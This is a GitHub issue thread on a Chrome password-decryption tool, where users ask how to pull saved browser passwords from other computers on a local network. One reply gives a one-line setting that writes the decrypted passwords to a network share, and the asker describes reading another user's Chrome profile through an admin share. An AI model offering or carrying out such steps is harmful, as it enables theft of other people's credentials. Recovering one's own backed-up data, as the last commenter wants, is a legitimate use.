ohyicong / decrypt-chrome-passwords

851 stars 185 forks source link

Extract passwords remotely #16

Open marcelofares opened 1 year ago

marcelofares commented 1 year ago

How to decrypt a remote machine via local network? Do I need to run it on the remote machine or can I run it locally to get access to remote passwords? I tested it on my machine and extracted the passwords saved locally, but I want it remotely, how can I do that?

seyedhojjathosseini commented 1 year ago

csv_path =fr"\192.168.1.1\decrypted_password.csv"

marcelofares commented 1 year ago

csv_path =fr"\192.168.1.1\decrypted_password.csv"

I got the login data file from another machine and wanted to find out the passwords on my computer by running py script .\decryp_chrome_password.py

I also wanted to try to remotely run the script to capture passwords from another computer within the same network like for example: \172.28.64.74\c$\Users\fernandes\AppData\Local\Google\Chrome\User Data\Default

Is this possible? I don't know the correct syntax of above command

I also noticed that the Brave Browser login data file was unable to show the passwords.

parkerlreed commented 1 year ago

Same here. I have a backup of a Windows drive on Linux and would like to run this against it,